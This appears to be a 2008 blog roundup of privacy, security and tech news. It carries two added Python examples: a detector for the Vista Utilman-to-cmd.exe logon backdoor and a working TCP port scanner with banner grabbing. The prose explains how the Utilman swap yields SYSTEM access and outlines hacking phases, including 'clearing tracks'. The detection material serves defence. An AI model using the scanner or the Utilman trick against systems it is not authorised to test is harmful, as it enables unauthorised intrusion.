Olympic Tickets Contain Microchip With Your Data

Posted by kdawson on Tuesday May 27, @11:11PM from the what-has-identity-to-do-with-intent dept. Privacy

OMNIpotusCOM writes

"Tickets to the Olympic opening and closing ceremonies will contain a microchip with information about the ticket holder, including a photograph, passport details, addresses, e-mail, and telephone numbers. The stated intent is to keep troublemakers out of the 91,000-seat National Stadium so that they cannot cause disruptions while China is on world-wide television, but it brings up serious concerns for privacy and identity theft."

The world, she is a changing...

In London, a Glimpse of a Broadband Future

Om Malik, Monday, May 26, 2008 at 7:06 PM PT

London is one of those few fortunate cities to have a surfeit of telecom competition. From broadband providers to mobile operators, Londoners have a choice. They have decent broadband speeds as well as access to Wi-Fi and 3G networks. And as a result, there has been a big change in their behavior.

A new report from Ofcom outlines how Londoners (and the rest of the UK) are using these new wireless and broadband services. It’s a great example of how consumer behavior changes with bandwidth.

Another blow to Microsoft?

May 27, 2008

A Strategy for Openness: Enhancing E-Records Access in New York State

Government Technology: "The New York State Office for Technology and the New York State Archives, a program of the State Education Department, issued a report last week that examines how the state can provide choice, interoperability and vendor neutrality in electronic document creation while ensuring electronic records are preserved and remain accessible. A Strategy for Openness: Enhancing E-Records Access in New York State makes recommendations to promote openness and transparency aimed at ensuring public records remain free from being locked into proprietary systems and software applications."

Big happenings in law...

May 27, 10:41 AM EDT

Justices turn down T-Mobile appeal over contracts


WASHINGTON (AP) -- The Supreme Court handed a defeat to T-Mobile USA Inc. Tuesday, rejecting the company's appeal in three cases involving the legal remedies available in millions of cell phone contracts.

The issue in the three cases is the same: whether state laws that limit the ability of companies to prohibit consumers from banding together to pursue class action lawsuits are preempted by federal law.


Internet-Based Realtors Win Monster Settlement

Posted by kdawson on Tuesday May 27, @07:20PM from the disintermediation-works-eventually dept. The Courts United States

coondoggie writes

"Until today, most Internet-based real-estate brokers were considered second-class citizens, and their clients were left in the cold. But perhaps that will change with today's news that the Department of Justice has reached a proposed settlement with the National Association of Realtors that requires NAR to let Internet-based residential real estate brokers compete with traditional brokers. NAR has agreed to be bound by a 10-year settlement, under whose terms NAR will repeal its anticompetitive policies and require affiliated multiple listing services to repeal their rules that were based on these policies."

Here's the whole settlement document on the DoJ's site.

Tsk Tsk

Court finds Dell guilty of fraud

N.Y. court finds that Dell deprived customers of technical support they bought or were eligible for under warranty

By Nancy Gohring, IDG News Service May 28, 2008

Dell was found guilty on Tuesday of fraud, false advertising, deceptive business practices, and abusive debt collection practices in a case brought by the New York attorney general.

The Albany County Supreme Court found that Dell deprived customers of technical support that they bought or were eligible for under warranty in several ways, including by requiring people to wait for very long times on the phone, repeatedly transferring their calls and frequently disconnecting their calls.

Dell also often failed to provide onsite repairs for customers who bought contracts for such support and often blamed software when hardware was actually the problem, the court found. The company also sometimes refused to offer support when a support contract ended, even though the user had first complained about a problem before the end of the contract. Subscribers to a "next-day" repair service sometimes waited as long as a year for support, the court found.

Developing hackers in the developing world...

OLPC's XO As a Wireless Hacking Tool

Posted by timothy on Tuesday May 27, @10:11AM from the well-equipped dept. Security Education Wireless Networking IT

twistedmoney99 writes

" has a whimsical yet intriguing look at the OLPC in an article series titled "One Leet Pwning Child — Give one, Get Owned". Part one details how to upgrade the core system with some extras, but part two is where the fun begins as the author converts the OLPC into a lean green hacking machine to enable wireless sniffing, setup the OLPC for vulnerability assessments, and stage the device for a little autopwning with Metasploit."

I want a grant to study the effects of beer on Global Warming - Grant Funding Search

Grant Gopher is a site that sends registered users weekly email announcements about available grants. Users can find out about federal, state, private, and local grant donations to open up funding possibilities for their causes. Possible grant receivers can be individuals, small businesses, and larger organizations. To find a grant that suits their cause, users may search the list of available grants, and refine their search with criteria that are relevant to their needs and qualities. This is a free site to use, and it also offers links to other free resources that users will find valuable, such as a grant glossary and a list of various grant forms.

I'm seeing many sites like this one. Perhaps enough to allow my students to work as teams, even though they are often not even in the same country... - Free Online Meetings and Screen Sharing

Mikogo allows anyone to implement presentations and online meetings for free. The screen sharing tool, once installed, allows up to ten users to connect and view content from one member’s computer screen. Mikogo allows access via remote control; presenters can easily be switched during a presentation; file sharing is enabled with privacy controls, and you can pause transmissions. Mikogo works with Skype as well, meaning you can share your screen and get free phone calls. It’s perfect for remote learning, webinars, remote support, product demos and online meetings. There’s a complete set of both audio and video tutorials for beginners.

Something for the little geeks.

Entertaining the Kids for Free - With Linux

By Katherine Noyes LinuxInsider Part of the ECT News Network 05/27/08 4:00 AM PT

Dilbert on the latest in computer security

Tuesday, May 27, 2008

Towards ubiquitous surveillance. Why didn't Google think of this?

Buses as Mobile Sensing Platforms?

Posted by ScuttleMonkey on Monday May 26, @07:06PM from the jealously-guarding-the-bus-lane dept. Transportation Wireless Networking

Roland Piquepaille writes

"According to European researchers, modern buses could be used as mobile sensing platforms, sending out live information to be used to control traffic and detect road hazards. The 3.83 million euro EU-funded MORYNE project was completed in March 2008 with a test in Berlin, Germany. During this test, the researchers 'equipped city buses with environmental sensors and cameras, allowing the vehicles to become transmitters of measurements, warnings and live or recorded videos to anyone allowed to access the data.' "

This is wrong on so many levels... Does no one proof read any more? Nice idea at the end...

Fruity link too juicy for kids

5:00AM Sunday May 25, 2008 By Alice Hudson

A healthy food website promoted to children on hundreds of bags of pre-packed mandarins has turned out to be a link to hardcore pornography.

... She replaced .com with and found what Levi was looking for - "a brilliant interactive site for children".

Finer said she phoned FreshMax thinking the .com address was a misprint. She said she was told the unregistered .com site had been hacked into. The company phoned back apologising for the glitch and promising to fix the problem.

... A free download available at offers young computer users an icon called Hector's Button. Used in many primary schools, it teaches children to click on a swimming dolphin on the computer screen if they come across anything that upsets them.

Chisholm said the screen would immediately be replaced with an underwater scene featuring Hector and a message telling the child to get an adult.

Hate Outlook? - AtMail Goes OpenSource

AtMail, originally created in 1998, was one of the first web-based mail solutions created as an alternative to Microsoft’s Outlook. Since then, it’s undergone four incarnations, with the latest taking on a Web 2.0 face with a simple and intuitive interface. And now, there’s an open source version available for users who want the same easy to use, feature rich webmail but for free. AtMail is written in PHP, has a lightweight Ajax interface which makes it faster, and includes videomail and IMAP support. If you’re familiar with Outlook or the commercial version of AtMail, this will have the same look and feel and it doesn’t cost a thing to use. Just download and get busy.

The last three installments of the “Assessment Methodology”

This one has potential

Search Engine for Instructional Information Launched

26th May 2008, 05:49 pm

New engine ( gave me some odd results, but I like the way it offers additional topic keywords.

For history and genealogy nuts, or you could make a movie for PBS

May 22, 2008

American Civil War Online

The Alexander Street Press has opened up access to their online Civil War collection: The American Civil War Online. From now through June 30th the resource is free to use online. This is an extensive and thoroughly engaging resource. Enjoy it while you can!

Monday, May 26, 2008

Note: This was announced on May 6th, but one line in this article caught my eye.

Stolen laptop contained students' personal information

By DANA C. SILANO Observer-Dispatch Posted May 24, 2008 @ 07:12 PM

HERKIMER — Students and applicants at Herkimer County Community College should watch their credit reports carefully, especially if they received a letter from the school notifying them of a stolen laptop from a SunGard employee.

... Kvinge said the computer belonged to a consulting employee of SunGard, and the incident occurred at a customer site. She would not disclose the name of the police agency that initially handled the case for security purposes. [Huh? Bob] For the same reason, she would not release the make or model of the computer.

“Naturally, we want to go public and let people know what's going on, but at the same time, when we go public, we're sending a message to the person who stole that laptop that there is personal information on there.”


Data “Dysprotection:” breaches reported last week

Monday, May 26 2008 @ 07:26 AM EDT Contributed by: PrivacyNews News Section: Breaches

A recap of incidents or privacy breaches reported last week for those who enjoy shaking their head and muttering to themselves with their morning coffee.

Source - Chronicles of Dissent

Interesting but futile? Another area not well covered by the ethical guidelines?

Law Firm Files Suit to Bar Outsourcing of Client Data

24th May 2008 posted in Outsourcing News and Top Outsourcing deals |


Law firms looking to cut costs by outsourcing their legal support services overseas could be jeopardizing their client confidentiality, according to a recent federal suit filed by a Bethesda, Md. firm.

Joseph Hennessey, name partner at Newman McIntosh & Hennessey, turned to the U.S. District Court for the District of Columbia on May 7 seeking a ruling on the outsourcing of privileged client data that may be subject to eavesdropping by the U.S. government.

... The firm is looking to the court to rule on whether outsourcing of legal services compromises constitutional rights and whether consent should be required before such data is sent abroad. It also wants the court to order law firms to disclose their use of foreign legal support and to order that the government establish protocols to shield attorney-client information from surveillance.

Summarizes the EU position, but I don't think it opens any new cans of worms.

Strong data protection rules are needed to prevent emergence of surveillance society

Monday, May 26 2008 @ 07:24 AM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

Surveillance technology is developing with breath-taking speed. This creates new instruments in the struggle against terrorism and organised crime, but also raises fundamental questions on the right to privacy for everyone. Individuals should be protected from intrusions into their private life and from the improper collecting, storing, sharing and use of data about them. Terrorism and organised crime must be combated - but not with means which undermine basic human rights.

Source - New Europe: Thomas Hammarberg, Commissioner for Human Rights for the Council of Europe

Tools & Techniques Still think system passwords protect your computer? (Note: This is amusing but not particularly useful. There are much simpler ways to gain access.)

Gaining System-Level Access To Vista

Posted by kdawson on Monday May 26, @12:51AM from the seems-too-simple-somehow dept. Security Windows

An anonymous reader writes

"This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator. The person who discovered this security hole claims that XP, 2000, 2003 and NT are not vulnerable to it; only Windows Vista is."
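The trick in the video is easy to spot after the fact if you log process creation: at the logon screen winlogon.exe starts the accessibility tools as SYSTEM, so a cmd.exe whose parent is winlogon.exe, or a utilman.exe whose version resource still says it is Cmd.Exe, is the signature. Below is an added detection example (Python, mine, not from the Slashdot post or the video). The log lines are constructed in a Sysmon-style key="value" format, and the check also covers the other accessibility binaries launched the same way (sethc.exe, osk.exe, magnify.exe, narrator.exe), which goes beyond the Vista/Utilman case in the post.

```python
"""Flag the accessibility-tool swap from process-creation log lines.

Added example, not from the Slashdot post. Log format is an assumption:
one process start per line, Sysmon-style fields written as key="value"
(Image, OriginalFileName, ParentImage, User).
"""
import ntpath
import re

# Accessibility executables winlogon.exe will start from the secure desktop
# before anyone logs in, mapped to the OriginalFileName their version
# resource should carry.
ACCESSIBILITY_TOOLS = {
    "utilman.exe": "utilman.exe",
    "sethc.exe": "sethc.exe",
    "osk.exe": "osk.exe",
    "magnify.exe": "magnify.exe",
    "narrator.exe": "narrator.exe",
}
SHELLS = {"cmd.exe", "powershell.exe"}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_line(line):
    """Turn 'Key="value" Key2="value2"' into a dict (empty dict if no fields)."""
    return dict(FIELD_RE.findall(line))


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\x\\cmd.exe' -> 'cmd.exe')."""
    return ntpath.basename(path).lower()


def check_event(event):
    """Return a reason string if the event matches the backdoor pattern, else None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    original = event.get("OriginalFileName", "").lower()

    # A shell started directly by winlogon.exe: the Image File Execution Options
    # variant, or a renamed copy with its own name restored.
    if parent == "winlogon.exe" and image in SHELLS:
        return f"{image} started by winlogon.exe (shell on the logon screen)"
    # utilman.exe on disk, but the PE still says it is cmd.exe: the file was swapped.
    if image in ACCESSIBILITY_TOOLS and original and original != ACCESSIBILITY_TOOLS[image]:
        return f"{image} carries OriginalFileName {original!r}: binary was replaced"
    # A genuine accessibility tool that went on to spawn a shell.
    if parent in ACCESSIBILITY_TOOLS and image in SHELLS:
        return f"{image} spawned by {parent}"
    return None


def scan_log(lines):
    """Return [(line_no, user, reason)] for every line that matches."""
    alerts = []
    for number, line in enumerate(lines, 1):
        event = parse_line(line)
        if not event:
            continue
        reason = check_event(event)
        if reason:
            alerts.append((number, event.get("User", ""), reason))
    return alerts


# Constructed sample: a legitimate Utilman launch, a normal user shell, the
# swapped binary from the video, and the IFEO-style variant.
SAMPLE_LOG = [
    r'Image="C:\Windows\System32\utilman.exe" OriginalFileName="utilman.exe" ParentImage="C:\Windows\System32\winlogon.exe" User="NT AUTHORITY\SYSTEM"',
    r'Image="C:\Windows\System32\cmd.exe" OriginalFileName="Cmd.Exe" ParentImage="C:\Windows\explorer.exe" User="LAB\alice"',
    r'Image="C:\Windows\System32\utilman.exe" OriginalFileName="Cmd.Exe" ParentImage="C:\Windows\System32\winlogon.exe" User="NT AUTHORITY\SYSTEM"',
    r'Image="C:\Windows\System32\cmd.exe" OriginalFileName="Cmd.Exe" ParentImage="C:\Windows\System32\winlogon.exe" User="NT AUTHORITY\SYSTEM"',
]

if __name__ == "__main__":
    for number, user, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: [{user}] {reason}")
```

Detection is the easy half. The attack needs a boot from removable media and a writable system volume, so the controls that actually stop it are the same ones the BackTrack video quietly assumes are absent: full-disk encryption and a locked-down boot order.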

Since I don't have one, you must. Lots of good statistics to quote.

Half of world's population has a mobile

Article from: Agence France-Presse From correspondents in Geneva May 25, 2008 04:58pm

THE number of mobile phone users worldwide soared to over 3.3 billion by the end of 2007, equivalent to a penetration rate of 49 percent, the International Telecommunications Union has said in a report.

Africa showed the strongest gains over the past two years and more than two thirds of all mobile subscribers were from developing countries by the end of 2007, the ITU said.

Part 2 lists more tools and furthers the hack.

Assessment Methodology (Part 2)

Posted by hitechpo on May 25, 2008 at 2:30pm

Sunday, May 25, 2008

This is looking more and more like there is something fishy here.

Blumenthal Seeks Tri-State Probe Of Bank Breach (BNY Mellon update)

Saturday, May 24 2008 @ 11:12 AM EDT Contributed by: PrivacyNews News Section: Breaches

The state has broadened its investigation into the loss of a computer backup tape that reportedly contained personal and financial information about an undetermined number of Connecticut bank depositors, including 556,000 customers of People's United Bank.

Attorney General Richard Blumenthal said Friday that he has contacted attorneys general in New York and New Jersey, asking them to initiate a tri-state investigation into the security breach.

Source -

[From the article:

The tape reportedly contains information, including names, addresses, dates of birth and Social Security numbers, for 4.5 million people nationwide, Blumenthal said.

The Bank of New York Mellon has not confirmed that any financial institution other than People's was involved, state officials said.

... Blumenthal said his office relied on "sources that were regarded as credible" who said Webster was involved. He said Mellon has yet to say in writing which banks' information was lost.

The Bank of New York Mellon reiterated Friday that because of the banking industry's confidentiality practices, [which trump the Disclosure Laws? Bob] it could not publicly divulge information about its client relationships.

You have to work hard to integrate exam answers into a copyright notice and then ensure that no one proofreads it before printing 12,000 copies. No doubt these are the same folks who promise to protect your personal information.

Every pupil's dream: the exam with answers on back

Thu May 22, 6:13 AM ET

... The OCR (Oxford, Cambridge and RSA) examination board admitted on Thursday that, because of a "printing error", papers sent to schools had answers to questions on the back page.

... "It is unlikely that any of the 12,000 students sitting the examination would have recognised the value of the information ... and subsequently used it," said the spokeswoman, adding there had been just 20 queries from teachers.

Might make an interesting hacking target...

May 24, 2008 4:17 pm US/Mountain

DIA Tests "Whole-Body Imaging"

DENVER (AP) ― Denver International Airport and five other airports are testing new technology to help security screeners detect guns and other prohibited items concealed under clothing.

The Transportation Security Administration was starting testing of its "whole body imaging" machines at DIA on Friday.

The technology makes use of beams of radio frequency energy that are projected over the body's surface. Energy reflected back from the body is used to construct a three-dimensional image.

The images are anatomically explicit, but passengers' faces are blurred, [Does this suggest we have better information on terrorist genitalia than terrorist faces? Bob] and security officials viewing the images are located in remote areas.

Florida-based airline consultant Stuart Klaskin shrugged off privacy concerns.

"There's a much-improved and expedited security-screening process using these machines," Klaskin said. "There probably is some momentary loss of privacy, but I don't think anyone has the time to look at these images in a prurient fashion. [There must be a way to record these images, how else would you demonstrate 'probable cause?' (Would you need to “un-blur” the image for the same reason?) Bob] Realistically, it's much ado over nothing."

Travelers will be randomly selected for the new screening technique. [Prove it! Bob]

The El Paso County Judicial Complex has been using similar whole-body screening. [Perhaps they can convince Google to add it to their Google Maps project. They can take photos of streets and images of people! Bob]

Well-intended consequences?

Patriot Act Dampening Cloud Computing?

Posted by kdawson on Saturday May 24, @01:38PM from the hey-you-get-offa-my-cloud dept. Government The Internet

Julie188 writes

"Governments are turning the Internet into a cyberspace reflection of real-world geographic conflicts. One report says that the Canadian government is forbidding its IT organizations to use services that store or host the government's data outside their sovereign territory. They especially cannot use services where the data is stored in the United States because of fears over the Patriot Act. What kinds of jurisdiction issues might people face — think Google cooperating with the Chinese government — as cloud computing becomes the norm and your data is stored in 'offshore parts' of the cloud?"

It looks like the White Hat Club is a go. Part of the strategy will be to gather and organize a hacking toolkit, so articles like this will be collected; software mentioned will be downloaded and analyzed, and the techniques shared...

Assessment Methodology (Part 1)

Posted by hitechpo on May 24, 2008 at 5:30pm

I've been down for a couple of days, but now I'm back. I wanted to include a series of instructions on assessing. (I will use the term assessing as opposed to 'hacking' due to the derogatory connotation that this term invokes.)

As a note, you should only be assessing those systems or networks that you have permission to assess. I will not be held responsible for any damages caused by someone using this information.

This information and more will be in my new book: "Information Security for Executives: The Practical Executive Guide to Information Security" (pending publication by the end of 2008). I thought I would give you a little glimpse of this guide now.

So here we go. These are the five (5) phases of the methodology behind conducting a vulnerability assessment:

1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Clearing Tracks
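Of the five phases, scanning is the one you can demonstrate without a target of your own. The added example below (Python, mine, not hitechpo's code or anything from the book) is a TCP connect scan with a banner grab, the kind of thing the toolkit will collect. To keep it self-contained it starts a throwaway listener on 127.0.0.1 and scans the ports around it; the listener, its banner and the port range are constructed for the demo.

```python
"""TCP connect scan with banner grab (the Scanning phase).

Added example, not from the Assessment Methodology post. Only scan hosts
you have permission to assess; the local listener exists so this file runs
against nothing but itself.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Complete a TCP handshake to host:port; return (port, is_open, banner)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                # Many services talk first (SSH, SMTP, FTP); read what they offer.
                banner = sock.recv(256)
            except OSError:  # includes socket.timeout: open port, silent service
                banner = b""
            return port, True, banner
    except OSError:
        # Connection refused, unreachable or timed out: closed or filtered.
        return port, False, b""


def connect_scan(host, ports, timeout=1.0, workers=32):
    """Probe the ports concurrently; return {port: banner} for the open ones."""
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for port, is_open, banner in pool.map(lambda p: probe(host, p, timeout), ports):
            if is_open:
                found[port] = banner
    return dict(sorted(found.items()))


def start_local_service(banner, host="127.0.0.1"):
    """Constructed target: listen on an ephemeral port, send `banner` to every
    client, and return the port number. Runs in a daemon thread."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, 0))
    server.listen(5)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return server.getsockname()[1]


if __name__ == "__main__":
    target_port = start_local_service(b"SSH-2.0-OpenSSH_4.7 demo\r\n")  # constructed banner
    hits = connect_scan("127.0.0.1", range(target_port - 5, target_port + 6))
    for port, banner in hits.items():
        print(f"{port}/tcp open  {banner.decode(errors='replace').strip()!r}")
```

A connect scan finishes the three-way handshake, so every probe shows up in the target's logs; that is the trade-off against a SYN scan, which needs raw sockets and therefore root. Phase 3 onward is where the permission line in the post stops being a formality.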

For my math class (all others keep out!)

I Will Derive

Posted by CmdrTaco on Saturday May 24, @12:33PM from the well-now-isn't-that-nice dept.

Jamie stumbled upon a very choice video this morning called I Will Derive. To the tune of some song you've never heard before, singing about subjects you know nothing about... oh and a a TI-84 cameo. It features the dopiest dancing you'll see on YouTube today. I promise.